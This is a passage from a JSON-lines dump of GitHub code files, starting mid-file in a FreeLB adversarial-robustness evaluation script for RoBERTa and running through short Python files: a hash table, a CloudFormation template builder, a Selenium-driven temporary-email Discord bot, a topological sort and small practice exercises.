\"analysis-models/freeadv-syncdp-RTE-iters2036-warmup122-lr1e-5-bsize2-freq8-advlr2e-2-advstep3-initmag5e-3-fp32-seed4207-abi0-beta0.999-stdadv\",\n \"analysis-models/RTE-baseline-86.69-4\"], type=str, nargs=\"+\", help=\"Will use the first one as anchor\")\n parser.add_argument(\"--chk-fname\", default=\"checkpoint_best.pt\", type=str)\n parser.add_argument(\"--task\", default=\"sentence_prediction\", type=str)\n parser.add_argument(\"--dset\", default=\"RTE\", type=str)\n parser.add_argument(\"--test-path\", default=\"glue_data\")\n parser.add_argument(\"--out-path\", default=\"glue-test\")\n parser.add_argument(\"--num\", default=0, type=int)\n # parser.add_argument(\"--batch-size\", default=2, type=int)\n parser.add_argument(\"--num-classes\", default=2, type=int)\n parser.add_argument(\"--max-positions\", default=512, type=int)\n parser.add_argument(\"--regression-target\", default=False, type=bool)\n parser.add_argument(\"--dataset-impl\", default=None)\n parser.add_argument(\"--init-token\", default=0, type=int)\n parser.add_argument(\"--separator-token\", default=2, type=int)\n parser.add_argument(\"--no-shuffle\", default=True, type=int)\n parser.add_argument(\"--seed\", default=1, help=\"Shall not be used. Placeholder\")\n parser.add_argument(\"--truncate-sequence\", default=False)\n parser.add_argument(\"--attn-layer-idx\", default=0, type=int)\n parser.add_argument(\"--gpu\", default=\"0\", type=str)\n parser.add_argument(\"--tol\", default=1e-5, type=float)\n parser.add_argument(\"--n-trials\", default=100, type=int)\n # parser.add_argument(\"--sample-idx\", default=[12,13], type=int, nargs=\"+\")\n # parser.add_argument(\"--max-norm-ratio\", default=0.22, type=float)\n parser.add_argument(\"--max-norm\", default=0.2, type=float)\n parser.add_argument(\"--norm-steps\", default=11, type=int)\n parser.add_argument(\"--adv-lr\", default=5e-3, type=float)\n # parser.add_argument(\"--init-mag-ratio\", default=0.01, type=float)\n parser.add_argument(\"--out-fname\", default='init.pt', type=str)\n parser.add_argument(\"--resume\", default=\"\", type=str)\n parser.add_argument(\"--suffix\", default=\"\", type=str)\n args = parser.parse_args()\n print(args)\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\" # see issue #152\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpu\n\n bin_task = \"MNLI\" if \"MNLI\" in args.dset or args.dset == \"AX\" else args.dset\n args.data = bin_task+\"-bin\"\n\n ncorrect, nsamples = 0, 0\n\n if not os.path.exists(args.out_path):\n os.makedirs(args.out_path)\n\n if not os.path.exists(os.path.join(args.out_path, \"scores\")):\n os.makedirs(os.path.join(args.out_path, \"scores\"))\n\n task = tasks.setup_task(args)\n\n split = \"valid\"\n\n task.load_dataset(split)\n batch_itr = task.get_batch_iterator(\n dataset=task.dataset(split),\n max_tokens=4400,\n max_sentences=16,\n max_positions=512,\n ignore_invalid_inputs=False,\n required_batch_size_multiple=1,\n seed=1,\n ).next_epoch_itr(shuffle=False)\n\n total_entropy, total_attns = 0, 0\n total_corr, total_samples = 0, 0\n scores_list = []\n\n total_norm_grad, total_tokens = 0, 0\n\n # 1. get the intersection where all models make the correct prediction\n roberta_hub_list = []\n for n_chk, chk_dir in enumerate(args.chk_dirs):\n roberta = RobertaModel.from_pretrained(\n chk_dir,\n checkpoint_file=args.chk_fname,\n data_name_or_path=bin_task + \"-bin\"\n )\n roberta.to('cuda')\n roberta.eval()\n roberta_hub_list.append(roberta)\n\n correct_idx_list = get_correct_idx(batch_itr, chk_dir, roberta)\n\n if n_chk == 0:\n valid_set = set(correct_idx_list)\n else:\n valid_set = valid_set & set(correct_idx_list)\n valid_idx_list = sorted(list(valid_set))\n\n # 2. get the radius for robust nets\n single_valid_iter = task.get_batch_iterator_from_idx(\n dataset=task.dataset(split),\n max_tokens=4400,\n max_sentences=1,\n max_positions=512,\n ignore_invalid_inputs=False,\n required_batch_size_multiple=1,\n seed=1,\n idx_list=valid_idx_list\n ).next_epoch_itr(shuffle=False)\n if args.resume:\n resume_dict = torch.load(args.resume)\n else:\n resume_dict = None\n eps_dict, max_loss_dict, init_loss_dict = get_radiuses(single_valid_iter, roberta_hub_list[0], resume_dict)\n torch.save({'eps_dict': eps_dict, 'max_loss_dict': max_loss_dict, \"init_loss_dict\":init_loss_dict}, 'losses/{}-maxeps{}-res-dict-anchor-{}.pt'.format(args.dset, args.max_norm, args.suffix))\n\n # 3. Get the max loss for other models in such radiuses\n init_loss_dict_list, max_loss_dict_list = [init_loss_dict], [max_loss_dict]\n for nr, roberta_hub in enumerate(roberta_hub_list[1:]):\n this_init_loss_dict, this_max_loss_dict = {}, {}\n for nb, batch in enumerate(single_valid_iter):\n id_int = batch['id'].item()\n eps = eps_dict[id_int]\n max_loss, init_loss = check_one_radius(eps, roberta_hub, batch)\n this_init_loss_dict[id_int] = init_loss\n this_max_loss_dict[id_int] = max_loss\n print(\"Model {}, sample {}, this max loss: {}, anchor max loss: {}\".format(nr, id_int, max_loss, max_loss_dict_list[0][id_int]))\n\n torch.save({'eps_dict': eps_dict, 'max_loss_dict': this_max_loss_dict, \"init_loss_dict\": this_init_loss_dict},\n 'losses/{}-maxeps{}-res-dict-{}-{}.pt'.format(args.dset, args.max_norm, nr, args.suffix))\n init_loss_dict_list.append(this_init_loss_dict)\n max_loss_dict_list.append(this_max_loss_dict)\n torch.save({'eps_dict': eps_dict, 'max_loss_dict': max_loss_dict_list, \"init_loss_dict\": init_loss_dict_list},\n 'losses/{}-maxeps{}-res-dict-all-{}.pt'.format(args.dset, args.max_norm, args.suffix))\n\n\n\n\n\n","repo_name":"zhuchen03/FreeLB","sub_path":"fairseq-RoBERTa/scripts/get_highest_loss.py","file_name":"get_highest_loss.py","file_ext":"py","file_size_in_byte":17874,"program_lang":"python","lang":"en","doc_type":"code","stars":247,"dataset":"github-code","pt":"53"} +{"seq_id":"9116239158","text":"#!/usr/bin/env python3\n\nimport cppyy\nimport os\n# install_path/lib/pythonX.Y/dist-packages/log2plot/__init__.py\ninstall_path = os.path.abspath(__file__)\nfor _ in range(5):\n install_path = os.path.dirname(install_path)\n\ncppyy.add_include_path(install_path + '/include')\ncppyy.include('log2plot/logger.h')\ncppyy.include('log2plot/config_manager.h')\ncppyy.load_library(install_path + '/lib/liblog2plot.so')\n\n# put methods / classes from log2plot C++ namespace into this one\nfor m in dir(cppyy.gbl.log2plot) + ['Logger', 'ConfigManager']:\n if not m[0] == '_':\n globals()[m] = getattr(cppyy.gbl.log2plot, m)\n\ndel m, install_path\n\n# Wrap std::vector\nVec = cppyy.gbl.std.vector['double']\n\n\ndef copy(src, dst: Vec):\n '''\n copy any Python type into the corresponding underlying std::vector\n does not check sizes, just assumes they match\n '''\n for i in range(dst.size()):\n dst[i] = src[i]\n","repo_name":"oKermorgant/log2plot","sub_path":"src/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"70248163050","text":"class HashTable:\n def __init__(self, sz, stp):\n self.size = sz\n self.step = stp\n self.slots = [None] * self.size\n\n def hash_fun(self, value): \n summa = len(value.encode('utf8'))\n return summa % self.size\n\n def seek_slot(self, value): \n hashStep = self.step\n hash = self.hash_fun(value)\n if self.slots[hash] is None:\n return hash\n nextIteration = False\n while self.slots[hash] is not None:\n hash += hashStep\n if hash >= len(self.slots):\n hash = hash - len(self.slots)\n nextIteration = True\n hashStep *= 2\n if nextIteration and hash > self.hash_fun(value):\n return None\n if nextIteration and hash + self.step >= len(self.slots):\n return None\n return hash\n\n def put(self, value): \n index = self.seek_slot(value)\n if index is None:\n return None\n self.slots[index] = value\n return index\n\n def find(self, value): \n index = None\n for i in range(len(self.slots)):\n slot = self.slots[i]\n if slot is not None and slot == value:\n return i\n return index\n","repo_name":"LexSteine/DataStructures1","sub_path":"HashTable.py","file_name":"HashTable.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26611832379","text":"# -*- coding: utf-8 -*-\n\nfrom aws_vapor.dsl import Template\nfrom aws_vapor.dsl import Metadatum\nfrom aws_vapor.dsl import Parameter\nfrom aws_vapor.dsl import Mapping\nfrom aws_vapor.dsl import Condition\nfrom aws_vapor.dsl import Resource\nfrom aws_vapor.dsl import Output\nfrom aws_vapor.dsl import Attributes\nfrom aws_vapor.dsl import Intrinsics\nfrom aws_vapor.dsl import Pseudos\nfrom aws_vapor.dsl import UserData\nfrom aws_vapor.dsl import CfnInitMetadata\n\n\ndef generate():\n t = Template(description='td-agent Template')\n\n ami_id = t.parameters(Parameter('AmiId')\n .description('EC2 machine image ID of the sample server')\n .type('AWS::EC2::Image::Id')\n )\n\n instance_type = t.parameters(Parameter('InstanceType')\n .description('EC2 instance type of the sample server')\n .type('AWS::EC2::KeyPair::KeyName')\n )\n\n security_group_ids = t.parameters(Parameter('SecurityGroupIds')\n .description('List of security group IDs of the sample server')\n .type('List')\n )\n\n key_name = t.parameters(Parameter('KeyName')\n .description('Name of an existing EC2 key pair to enable SSH access to the sample server')\n .type('AWS::EC2::KeyPair::KeyName')\n )\n\n subnet_id = t.parameters(Parameter('SubnetId')\n .description('Subnet ID which the sample server runs on')\n .type('AWS::EC2::Subnet::Id')\n )\n\n sample_server = t.resources(Resource('MongoDBServer').type('AWS::EC2::Instance').properties([\n Attributes.of('ImageId', ami_id),\n Attributes.of('InstanceType', instance_type),\n Attributes.of('SecurityGroupIds', security_group_ids),\n Attributes.of('KeyName', key_name),\n Attributes.of('SubnetId', subnet_id)\n ]))\n\n sample_server.add_property(UserData.from_files([\n ('files/x-shellscript', 'x-shellscript'),\n ('files/cloud-config', 'cloud-config')\n ], {\n 'stack_id': Pseudos.stack_id(),\n 'resource_name': sample_server.name,\n 'region': Pseudos.region()\n }))\n\n sample_server.metadata(CfnInitMetadata.of([\n CfnInitMetadata.Init([\n CfnInitMetadata.ConfigSet('default', [\n CfnInitMetadata.Config('SetupRepos')\n .commands('import_td-agent_GPG-KEY', 'rpm --import https://packages.treasuredata.com/GPG-KEY-td-agent')\n ,\n CfnInitMetadata.Config('Install')\n .packages('yum', 'dstat')\n .packages('yum', 'td-agent')\n .commands('install_td-agent_plugin', 'td-agnet-gem install fluent-plugin-dstat fluent-plugin-map fluent-plugin-forest')\n ,\n CfnInitMetadata.Config('Configure')\n .files('/etc/td-agent/td-agent.conf', local_file_path='files/td-agent.conf', mode='000644', owner='root', group='root')\n ,\n CfnInitMetadata.Config('Start')\n .services('sysvinit', 'td-agent', enabled=True, ensure_running=True)\n ])\n ])\n ]))\n\n return t\n","repo_name":"ohtomi/aws-vapor","sub_path":"examples/td-agent.py","file_name":"td-agent.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"20086123725","text":"from selenium import webdriver\nimport time\nimport os\nimport discord\nfrom dotenv import load_dotenv\n\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\n\n# from bs4 import BeautifulSoup\n\nurl = 'https://10minutemail.com'\nclient = discord.Client()\ndrivers = dict()\nsess_starts = dict()\nopts = webdriver.firefox.options.Options()\nopts.headless = True\n\n\n@client.event\nasync def on_ready():\n print('We have logged in as {0.user}'.format(client))\n\n\n@client.event\nasync def on_message(message):\n user = message.author\n if user in drivers and sess_starts[user] + 900 < time.time():\n del drivers[user]\n del sess_starts[user]\n await message.channel.send('Your session expired')\n if user == client.user:\n return\n if message.content.startswith('$'):\n if message.content == '$create':\n driver = webdriver.Firefox(options=opts)\n drivers[user] = driver\n sess_starts[user] = time.time()\n driver.get(url)\n time.sleep(5)\n temp_mail = driver.find_element_by_id('mail_address').get_attribute('value')\n await message.channel.send('Your temporary mail is : %s' % temp_mail)\n\n elif user in drivers:\n driver = drivers[user]\n msgs_count = int(driver.find_element_by_id('inbox_count_number').text)\n messages = driver.find_elements_by_class_name('mail_message')\n if message.content == '$check':\n preview = ''\n if msgs_count > 0:\n preview = ':\\n'\n for i in range(len(messages)):\n msg = messages[i]\n preview = preview + '(' + str(i + 1) + \\\n '). From: ' + msg.find_element_by_class_name('small_sender').text + \\\n ' | Subject: ' + msg.find_element_by_class_name('small_subject').text + \\\n ' | Date: ' + msg.find_element_by_class_name('small_date').text + '\\n'\n await message.channel.send('You have ' + str(msgs_count) + ' messages in mailbox' + preview)\n\n elif message.content == '$end':\n driver.quit()\n del drivers[user]\n await message.channel.send('Your session ended')\n\n else:\n msg_split = message.content.split(maxsplit=2)\n if msg_split[0] == '$read':\n try:\n msg_index = int(msg_split[1])\n except ValueError:\n await message.channel.send('Unsupported index')\n else:\n if msg_index > msgs_count or msg_index <= 0:\n await message.channel.send('The message with that index does not exist, you only have ' +\n str(msgs_count) + ' messages')\n else:\n msg = messages[msg_index - 1]\n print(msg.find_element_by_class_name('message_bottom').is_displayed())\n if not msg.find_element_by_class_name('message_bottom').is_displayed():\n msg.click()\n txt_to_print = msg.find_element_by_class_name('message_bottom').text\n await message.channel.send(txt_to_print)\n\n elif msg_split[0] == '$reply_to':\n try:\n msg_index = int(msg_split[1])\n except ValueError:\n await message.channel.send('Unsupported index')\n else:\n if msg_index > msgs_count or msg_index <= 0:\n await message.channel.send('The message with that index does not exist')\n else:\n msg = messages[msg_index - 1]\n if not msg.find_element_by_class_name('message_bottom').is_displayed():\n await message.channel.send('Maybe you should read it first?')\n else:\n text_to_reply = msg_split[2]\n print(text_to_reply)\n msg.find_element_by_class_name('message_reply_icon').click()\n msg.find_element_by_class_name('reply_message_text').send_keys(text_to_reply)\n msg.find_element_by_class_name('reply_message_submit').click()\n\n elif msg_split[0] == '$forward':\n try:\n msg_index = int(msg_split[1])\n except ValueError:\n await message.channel.send('Unsupported index')\n else:\n if msg_index > msgs_count or msg_index <= 0:\n await message.channel.send('The message with that index does not exist')\n else:\n msg = messages[msg_index - 1]\n if not msg.find_element_by_class_name('message_bottom').is_displayed():\n await message.channel.send('Maybe you should read it first?')\n else:\n forward_address = msg_split[2]\n msg.find_element_by_class_name('message_forward_icon').click()\n msg.find_element_by_class_name('forward_message_address').send_keys(forward_address)\n msg.find_element_by_class_name('forward_message_submit').click()\n else:\n await message.channel.send('Your session does not exist')\n\nclient.run(TOKEN)\n","repo_name":"Fenfiriy/TrainingWheels","sub_path":"0.py","file_name":"0.py","file_ext":"py","file_size_in_byte":5785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19353090604","text":"\"\"\"\nTopological sort practice problem\n\"\"\"\n\n\nclass Node(object):\n \"\"\"A node in the DAG\n \"\"\"\n\n def __init__(self, adj):\n \"\"\"\n\n :param adj: Sequence of adjacent 0-based node indexes.\n \"\"\"\n self.adj = tuple(adj)\n\n\nclass DAG(object):\n def __init__(self, nodeSpecs):\n \"\"\"\n\n :param nodeSpecs: an ordered sequence of sequences. Each sub-sequence\n represents a node and its elements are 0-based indexes to the adjacent\n nodes relative to the first sub-sequence in this arg. e.g.,\n [\n [3], # node 0\n [2, 3], # node 1\n [4], # node 2\n [], # node 3\n [], # node 4\n ]\n\n The graph [[1, 2],[3], [3], [2]] would be an invalid DAG due to the\n cycle [0, 1, 3, 2, 3]\n\n :raises: ValueError, TypeError if problems found with input args, such\n as non-integer or out-of-range node indexes or cycle in graph.\n \"\"\"\n self.nodes = []\n for adj in nodeSpecs:\n self.nodes.append(Node(adj))\n\n # Check for adjacent indexes out of bounds\n for nodeIdx, node in enumerate(self.nodes):\n for adjIdx in node.adj:\n if not isinstance(adjIdx, (int, long)):\n raise TypeError(\n \"adjIdx {0!r} of node {1} must be int or long\".format(\n adjIdx, nodeIdx))\n if adjIdx < 0 or adjIdx >= len(self.nodes):\n raise ValueError(\n \"adjIdx {0!r} of node {1} is out of bounds\".format(\n adjIdx, nodeIdx))\n\n # Check for cycles\n cyclePath = []\n if self.isCyclic(cyclePath=cyclePath):\n raise ValueError(\"Found cycle in graph: {!r}\".format(cyclePath))\n\n\n def isCyclic(self, cyclePath=None):\n \"\"\"\n\n :param list cyclePath: if a cycle is found, the corresponding node\n indexes will be inserted into this list if it's not None\n\n :return: True if cycle found in graph, False if not\n \"\"\"\n if not self.nodes:\n return False\n\n # Get indexes of nodes without any incoming edges\n rootNodeIndexes = [i for i, count in\n enumerate(self.getInboundEdgeCounts())\n if count == 0]\n if not rootNodeIndexes:\n # All nodes have incoming edges, so must be a cycle\n if cyclePath is None:\n return True\n else:\n # Search for cycles from every sub-graph so that we can\n # report a cycle via cyclePath arg\n rootNodeIndexes = list(xrange(len(self.nodes)))\n\n\n # Perform (depth first traversal) checking for back edges\n # TODO Should these be inside the for-loop below?\n visited = [False] * len(self.nodes)\n inRecursionStack = [False] * len(self.nodes)\n\n for rootIdx in rootNodeIndexes:\n if self._isCyclicHelper(rootIdx=rootIdx, visited=visited,\n inRecursionStack=inRecursionStack,\n cyclePath=cyclePath):\n return True\n\n\n def _isCyclicHelper(self, rootIdx, visited, inRecursionStack,\n cyclePath=None):\n \"\"\"Use depth-first-traversal to detect if the graph is cyclic.\n\n :param rootIdx: Index of the sub-graph's root node\n :param visited: list of booleans, each indicating whether the\n sub-graph rooted at the corresponding node has been explored.\n :param inRecursionStack: list of booleans, each indicating whether the\n corresponding node is an ancestor of the node being explored.\n :param list cyclePath: if a cycle is found, the corresponding node\n indexes will be inserted into this list if it's not None\n\n :return: True if cycle found, False if not\n \"\"\"\n # The current root is being visited and is in recursion stack\n inRecursionStack[rootIdx] = True\n\n # Traverse all vertexes adjacent to this one looking for back edges\n # into nodes that are currently in recursion stack.\n for adjIdx in self.nodes[rootIdx].adj:\n\n if visited[adjIdx]:\n # Sub-graph at adjIdx already explored\n continue\n\n if inRecursionStack[adjIdx]:\n # Edge from rootIdx to adjIdx is part of a cycle\n if cyclePath is not None:\n cyclePath.insert(0, adjIdx)\n cyclePath.insert(0, rootIdx)\n return True\n\n if self._isCyclicHelper(adjIdx,\n visited,\n inRecursionStack,\n cyclePath):\n if cyclePath is not None:\n cyclePath.insert(0, rootIdx)\n return True\n\n # Done exploring the sub-graph rooted at rootIdx\n visited[rootIdx] = True\n\n # Remove rootIdx node from the exploration path\n inRecursionStack[rootIdx] = False\n return False\n\n def getTopologicalOrder(self):\n \"\"\"\n\n :return: Sequence of the graph's node indexes in topological order\n \"\"\"\n # Initialize inbound edge counts for all nodes\n inboundEdgeCounts = self.getInboundEdgeCounts()\n\n # Initialize work queue with indexes of nodes without inbound edges\n workQueue = [i for i, count in enumerate(inboundEdgeCounts)\n if count == 0]\n\n # Ordered list will be filled with topologically ordered node indexes\n orderedList = []\n\n while workQueue:\n # Dequeue the next node index without inbound edges and add it to\n # result\n rootIdx = workQueue.pop(0)\n orderedList.append(rootIdx)\n\n # Remove root's edges, placing indexes of adjacent nodes that reach\n # 0 inbound count on the work queue\n for adjIdx in self.nodes[rootIdx].adj:\n inboundEdgeCounts[adjIdx] -= 1\n assert inboundEdgeCounts[adjIdx] >= 0\n if inboundEdgeCounts[adjIdx] == 0:\n workQueue.append(adjIdx)\n\n if len(orderedList) > len(self.nodes):\n Exception(\"Logic error - ordered list has more nodes than graph\")\n\n if len(orderedList) < len(self.nodes):\n Exception(\"Ordered list has fewer nodes than graph = cycle!\")\n\n return orderedList\n\n def getInboundEdgeCounts(self):\n \"\"\"\n\n :return: Sequence of inbound edge counts. Each element in the sequence\n contains the inbound edge counts for the corresponding node in\n self.nodes.\n \"\"\"\n counts = [0] * len(self.nodes)\n\n for i, node in enumerate(self.nodes):\n for nodeIdx in node.adj:\n counts[nodeIdx] += 1\n\n return counts\n","repo_name":"vitaly-krugl/interview-prep","sub_path":"cracking_problems/toposort/toposort.py","file_name":"toposort.py","file_ext":"py","file_size_in_byte":6974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20429518427","text":"class Solution:\n def findSmallestSetOfVertices(self, n: int, edges: List[List[int]]) -> List[int]:\n \n degrees = defaultdict(list)\n outDegree = set()\n inDegree = set()\n \n for edge in range(len(edges)):\n degrees[edges[edge][0]].append(edges[edge][1])\n \n for k,v in degrees.items():\n outDegree.add(k)\n for val in v:\n inDegree.add(val)\n \n common = outDegree.intersection(inDegree)\n answer = outDegree - common\n \n return list(answer)","repo_name":"ekramkedir2020/interview-prep","sub_path":"1557-minimum-number-of-vertices-to-reach-all-nodes/1557-minimum-number-of-vertices-to-reach-all-nodes.py","file_name":"1557-minimum-number-of-vertices-to-reach-all-nodes.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3720292906","text":"import re\n\ndef find_n_sort_monies():\n l = []\n n = 0\n r = open('test2','r')\n e = r.readlines()\n for x in e:\n if '9/9' in x:\n try:\n dol = re.search('(\\$\\d* | \\$\\s\\d*)', x)\n dol3 = int(dol.group().strip('$ '))\n dol4 = re.search('/\\w+/tix/\\w+',x)\n sec = re.search('Section\\s\\d*', x)\n #l.append([dol3,n,'http://sfbay.craigslist.org',sec.group()])\n #l.append([dol3,n,'http://sfbay.craigslist.org'+dol4.group()+'.html',sec.group()])\n l.append([dol3,n,'http://sfbay.craigslist.org'+dol4.group()+'.html'])\n n += 1\n except AttributeError:\n n += 1 \n t = (sorted(l))\n for u in t:\n print(u)\n print(len(t))\n \nif __name__=='__main__':\n find_n_sort_monies()\n \n","repo_name":"gittyhub/Scrapper_Giants_Tickets","sub_path":"Giantpack/find_date4.py","file_name":"find_date4.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16156897169","text":"import csv\n\ndef writeCsv(path, data):\n with open(path,\"w\", newline=\"\") as f:\n writer = csv.writer(f)\n for row in data:\n print(\"row =\", row)\n writer.writerow(row)\n\ndata = [[1,2,3],[1,2,3],[1,2,3] ]\npath = \"writer.csv\"\n\nwriteCsv(path,data)\n","repo_name":"rainbow520lxr/PythonStudy","sub_path":"Python编程思想/自动化办公/读写csv文件/写csv文件.py","file_name":"写csv文件.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"27782278239","text":"# Given a rope of length n meters, cut the rope in different parts of integer lengths in a way that maximizes product of lengths of all parts. You must make at least one cut. Assume that the length of rope is more than 2 meters.\n#https://www.geeksforgeeks.org/maximum-product-cutting-dp-36/\n\ndef max_product_from_cut_pieces(n):\n \"\"\"\n Args:\n n(int32)\n Returns:\n int64\n \"\"\"\n # Write your code here.\n table = [0] * (n+1)\n\n for i in range(1, n+1):\n largest_prod = 0\n for left_cut in range(1, i):\n right_cut = i - left_cut\n\n best_right_cut = table[right_cut]\n\n curr_prod = left_cut * max(right_cut, best_right_cut)\n\n largest_prod = max(largest_prod, curr_prod)\n\n table[i] = largest_prod\n\n return table[n]\n","repo_name":"n-gibs/dsa","sub_path":"dp/practice/cut_the_rope.py","file_name":"cut_the_rope.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26527471291","text":"# -*- coding: utf-8 -*-\n\"\"\"\n**************************************************************************************\n* Simple OCR\n* ===============\n* This program is intended to perform simple OCR in a given image/\n* MODULE: test_tesseract\n* Filename: test_tesseract.py\n* Version: 1.0.0 \n* Date: January 9, 2019\n* \n* Author: Aditya Kumar Singh\n* Team Name: Victorious Visionaries\n* Team Members: Aditya Kumar Singh, Raj Kumar Bhagat,\n* Ruphan S, Yash Patel\n***************************************************************************************\n\"\"\"\n\n#Importing required Libraries\n\ntry:\n from PIL import Image\nexcept ImportError:\n import Image\n\nimport os\nimport pytesseract\nimport cv2\n\n\"\"\"\n This program is just to test the OCR functionality.\n This will read an image and then tries to read text present in it.\n If found(any), then tthe text will be printed on the screen\n\"\"\"\ntext = cv2.imread('text.jpg')\ncv2.imshow('text',text)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\nprint(pytesseract.image_to_string(text))\n\n\"\"\"\nTo test the rotation detection functionality of the tesseract\n\"\"\"\ntest_images = ['test1_0.jpg', 'test1_90.jpg', 'test1_180.jpg', 'test_tilt.png']\nfor image in test_images:\n path = os.path.join('..\\\\Images', image)\n img = cv2.imread(path)\n cv2.imshow(image, img)\n print(image+' :', '\\n', pytesseract.image_to_osd(path), '\\n')\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"spider-tronix/portable-braille","sub_path":"Code/Old Codes/test_tesseract.py","file_name":"test_tesseract.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41100621613","text":"\nfrom dataclasses import dataclass\nfrom datetime import date\nfrom typing import List\n\n@dataclass\nclass Transaction:\n date : date\n type : str\n qty : float\n price : float\n cost : float\n\n@dataclass\nclass Saldo:\n date :date\n qty : float\n\ndef converter_em_class( arquivo_transactions): \n lista_trasanctions : List[Transaction]=[]\n\n for i in arquivo_transactions:\n transaction = Transaction(**i)\n lista_trasanctions.append(transaction)\n return lista_trasanctions\n\n\ndef pegar_saldo(lista_trasanctions):\n saldo =0\n lista_saldo = []\n\n if len(lista_trasanctions)>0:\n data_inicial = lista_trasanctions[0].date\n for transaction in lista_trasanctions:\n if transaction.date !=data_inicial:\n lista_saldo.append(Saldo( date = data_inicial, qty = saldo))\n\n data_inicial= transaction.date\n if transaction.type ==\"BUY\":\n saldo +=transaction.qty\n\n if transaction.type ==\"SELL\":\n saldo -= transaction.qty\n\n lista_saldo.append(Saldo(date = data_inicial, qty=saldo)) \n return lista_saldo ","repo_name":"samuelsacaia/TAcademy-Lista3","sub_path":"src/application/domain.py","file_name":"domain.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35364344565","text":"import math\n\nfrom sympy import true\n\n\ndef locate_card(cards,query):\n # brute force\n position = 0\n while true:\n if cards[position] == query:\n return position\n position += 1\n if position == len(cards):\n return -1\n \n\n\n# cards = [13,11,10,9,7,4,3,2,1]\n# query = 7\n# output = 4\n\n# result = output\n\n# test = {\n# 'input':{\n# 'cards':[13,11,10,7,4,3,1,0],\n# 'query':7\n# },\n# 'output': 3\n# }\n\n# locate_card(**tests['input']) == test['output']\n# edge case\n# query is the first element\n# query is the last element\n# just one input\n# no query in the input\n# list of cards is empty\n# cards containing repeated numbers\n# number query occurs more than one position in cards\n\ntests = []\n\ntests.append({'input':{\n 'cards':[13,11,10,7,4,3,1,0],\n 'query':7\n },\n 'output': 3})\n\nresult = locate_card(tests['input']['cards'],tests['input']['query'])\nresult\n\nif result == tests['output']:\n print (True )\n\n","repo_name":"Prasannanatu/machinelearning","sub_path":"Softmax_Regression and Neural_Network/hw4/LeTsDoIt/algo1.py","file_name":"algo1.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6037824742","text":"from tksheet import Sheet\nimport tkinter as tk\n\napp = tk.Tk()\napp.grid_columnconfigure(0, weight = 1)\napp.grid_rowconfigure(0, weight = 1)\n\nmain_frame = tk.Frame(app)\nmain_frame.grid(row = 0, column = 0, sticky = \"nsew\", padx = 10, pady = 10)\n\nentry = tk.Entry(main_frame)\nentry.grid(row = 0, column = 0, sticky = \"ew\", padx = 10, pady = 10)\n\ncellValueFr = tk.Frame(main_frame)\ncellValueFr.grid(row = 1, column = 0, sticky = \"nw\", padx = 10, pady = 10)\n\nl = tk.Label(cellValueFr, text=\"fauihf fir huireh g\")\nl.grid(row = 0, column = 0, sticky = \"nw\")\n\nmain_frame.grid_columnconfigure(0, weight = 1)\nmain_frame.grid_rowconfigure(1, weight = 1)\n\nsheet = Sheet(main_frame,\n total_rows = 1200,\n total_columns = 30)\nsheet.grid(row = 2, column = 0, sticky = \"nswe\", padx = 10, pady = 10)\napp.mainloop()","repo_name":"longk15t/PythonTkinterApp","sub_path":"resizable.py","file_name":"resizable.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16764890973","text":"a = [3,3,2,4,1]\n\ndef fun(a):\n count = 0\n for i in range(len(a)):\n largest = a[0]\n seclargest = 0\n for j in range(1, len(a)):\n if a[j] >= largest:\n largest = a[j]\n print(largest)\n for k in range(len(a)):\n if a[k] < largest and a[k] != largest:\n if a[k]>=seclargest:\n seclargest = a[k]\n print(seclargest) \n diff = largest - seclargest\n print(diff)\n for l in range(len(a)):\n if a[l] == largest:\n a[l] = a[l] - diff\n count=count+1\n print(a) \n for i in range(1,len(a)):\n if a[i]==a[i-1]:\n if i == len(a) - 1:\n return count\n else:\n break \nprint(fun(a)) ","repo_name":"imanirudh1/coding_interview_questions","sub_path":"plies_of_boxes.py","file_name":"plies_of_boxes.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38066549090","text":"#write a function that builds a dictionary describing album\ndef make_album(artist_name,album_title,number_track = 0):\n \"\"\"dictionary artist name and album title\"\"\"\n\n albums = {\n 'Artist':artist_name,\n 'Title':album_title,\n }\n if number_track:\n albums['Tracks'] = number_track\n \n return albums\n#call make_album\nalbum = make_album('David','praise',8)\nprint(album)\n\nwhile True:\n print(\"\\nPlease, enter album description\")\n print(\"enter 'q' to quit\")\n artist = input(\"Enter artist name: \")\n if artist == 'q':\n break\n title = input(\"Enter title of the album: \")\n if title == 